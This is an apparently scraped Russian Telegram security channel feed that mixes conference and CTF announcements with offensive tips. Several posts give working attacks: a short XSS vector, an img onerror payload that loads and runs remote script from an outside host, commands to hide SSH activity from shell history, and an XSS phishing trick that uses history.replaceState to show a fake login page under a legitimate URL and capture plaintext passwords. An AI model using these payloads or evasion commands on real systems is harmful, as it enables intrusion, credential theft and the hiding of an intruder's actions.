https://channel9.msdn.com/Events/Build/Russian-Online-Translation-Build-2016?CR_CC=200771969
А тут трансляция. Только что запустили emacs из bash'а!
Да, в windows запилили BASH! BASH КАРЛ!
А тут трансляция. Только что запустили emacs из bash'а!
Да, в windows запилили BASH! BASH КАРЛ!
Channel 9
Build 2016 (русскоязычная трансляция) (Channel 9)
Конференция Build будет посвящена всем платформам Microsoft- вас ждет множество материалов и информации о Windows, Azure, Office 365 и других решениях. Три дня през
❤🔥1
Сегодня второй день Build'а, если кому интересно. Будут опять что-то презентовать и рассказывать про будущее MS.
Трансляция тут https://channel9.msdn.com/
Трансляция тут https://channel9.msdn.com/
Docs
Shows - Event & Video Content
Browse thousands of hours of video content from Microsoft. On-demand video, certification prep, past Microsoft events, and recurring series.
❤🔥1
Один из коротких векторов для выполнения JS при XSS атаке:
Событие
Эксплуатабельность низкая, но для bugbounty, когда жесткие ограничения на длину вектора - сойдёт.
<q/oncut=alert()>X
Событие
oncut
сработает, если пользователь попытается вырезать содержимое, т.е. выделет текст и нажмет CTRL+X. Эксплуатабельность низкая, но для bugbounty, когда жесткие ограничения на длину вектора - сойдёт.
❤🔥1
А это более прикольная альтернатива alert'у
Хоть и боян
<img src onerror="(function(u){var d=document,s=d.createElement('scri'+'pt');s.src=u;(d.head||d.documentElement).appendChild(s);s.parentNode.removeChild(s);}('//bo0om.ru/xss.js'));">
Хоть и боян
❤🔥1
Большая коллекция ссылок по эксплуатации дескриализации в Java
https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
GitHub
GitHub - GrrrDog/Java-Deserialization-Cheat-Sheet: The cheat sheet about Java Deserialization vulnerabilities
The cheat sheet about Java Deserialization vulnerabilities - GrrrDog/Java-Deserialization-Cheat-Sheet
❤🔥1
А вот и доклады с defcon russia подъехали!
Ломаем автомобили с Алексеем Синцовым. Доклад - Testing CAN network with help of CANToolz
Видео - http://www.youtube.com/watch?v=UbkhBIhbh_o
Презентация -
http://www.slideshare.net/AlexeySintsov/testing-can-network-with-help-of-cantoolz
Репозиторий - https://github.com/eik00d/CANToolz
Доклад Александра Большева - Never Trust Your Inputs or How To Fool an ADC
Видео - http://www.youtube.com/watch?v=jH1bgIGUNc0
Презентация -
http://www.slideshare.net/DefconRussia/dcg-25-never-trust-your-inputs-or-how-to-fool-an-adc
Ломаем автомобили с Алексеем Синцовым. Доклад - Testing CAN network with help of CANToolz
Видео - http://www.youtube.com/watch?v=UbkhBIhbh_o
Презентация -
http://www.slideshare.net/AlexeySintsov/testing-can-network-with-help-of-cantoolz
Репозиторий - https://github.com/eik00d/CANToolz
Доклад Александра Большева - Never Trust Your Inputs or How To Fool an ADC
Видео - http://www.youtube.com/watch?v=jH1bgIGUNc0
Презентация -
http://www.slideshare.net/DefconRussia/dcg-25-never-trust-your-inputs-or-how-to-fool-an-adc
❤🔥1
Если ты подключен к SSH и хочешь скрыть, что делалось на машине, полезно после всех действий выполнить
Это убет собственный процесс, а последние команды в .bash_history не запишутся.
Или можно ввести
kill -9 $$
Это убет собственный процесс, а последние команды в .bash_history не запишутся.
Или можно ввести
unset HISTFILE
(с пробелом в начале), чтобы не писать в историю вовсе.❤🔥1
Кстати, ночью стартует HackQuest!
http://www.phdays.ru/press/news/46226/
Будет много веба, задача - найти уязвимость, успешно ее проэксплуатировать и достать некий секрет (он же флаг).
Даже если не собираешься что-то выигрывать, можешь попробовать найти уязимости на одном из сайтов, задания будут как легкие, так и хардкорные.
Когда стартанём, еще разок напомню ;)
http://www.phdays.ru/press/news/46226/
Будет много веба, задача - найти уязвимость, успешно ее проэксплуатировать и достать некий секрет (он же флаг).
Даже если не собираешься что-то выигрывать, можешь попробовать найти уязимости на одном из сайтов, задания будут как легкие, так и хардкорные.
Когда стартанём, еще разок напомню ;)
❤🔥1
Итак, стартует HackQuest
www.tg-me.com/wlrm_phd_hq_bot
А вот и ссылка на участие :)
Да-да, прямо в telegram!
Удачи!
www.tg-me.com/wlrm_phd_hq_bot
А вот и ссылка на участие :)
Да-да, прямо в telegram!
Удачи!
Telegram
PHDays VI. HackQuest bot
You can contact @WLRM_PHD_HQ_bot right away.
❤🔥1
Поздравляем победителей HackQuest'а!
1. 11000 firsov
2. 8300 cdump
3. 8300 DarkCaT
4. 8300 rrockru
5. 7000 invent
6. 7000 MERRON
7. 6200 FessDom
8. 5900 AV1ct0r
9. 5500 kreon
10. 5300 yngwie007
❤🔥1
Трансляция 12 встречи #DC7499 доступна по ссылке https://youtu.be/F5p_NW5q48M
Программа докладов http://defcon.su/12/
Программа докладов http://defcon.su/12/
❤🔥1
Недавно наткнулся на расширение файла php7.
http://lab.onsec.ru/2016/04/new-php-extensions-should-be-hardcoded.html
http://lab.onsec.ru/2016/04/new-php-extensions-should-be-hardcoded.html
❤🔥1
Атакуя с помощью XSS, можно динамически подменить текущий url страницы в пределах одного сайта.
Делается это так:
Очень эффективно отобразить фейковое окно аутентификации (мол, сессия твоя истекла) и подменить url. Запоминалки паролей заполнят нужные поля, да и рядовой юзер (даже продвинутый) поведётся на фейк внутри лигитимного сайта. Я бы повёлся. И ты.
Так убиваются два зайца (царствие им небесное) - не требуется воровать cookie, так как они в большинстве случаев уже с флагом HttpOnly и атакующий получает пароли plaintext'ом!
Делается это так:
window.history.replaceState(null, '', 'https://site.com/login');
Очень эффективно отобразить фейковое окно аутентификации (мол, сессия твоя истекла) и подменить url. Запоминалки паролей заполнят нужные поля, да и рядовой юзер (даже продвинутый) поведётся на фейк внутри лигитимного сайта. Я бы повёлся. И ты.
Так убиваются два зайца (царствие им небесное) - не требуется воровать cookie, так как они в большинстве случаев уже с флагом HttpOnly и атакующий получает пароли plaintext'ом!
1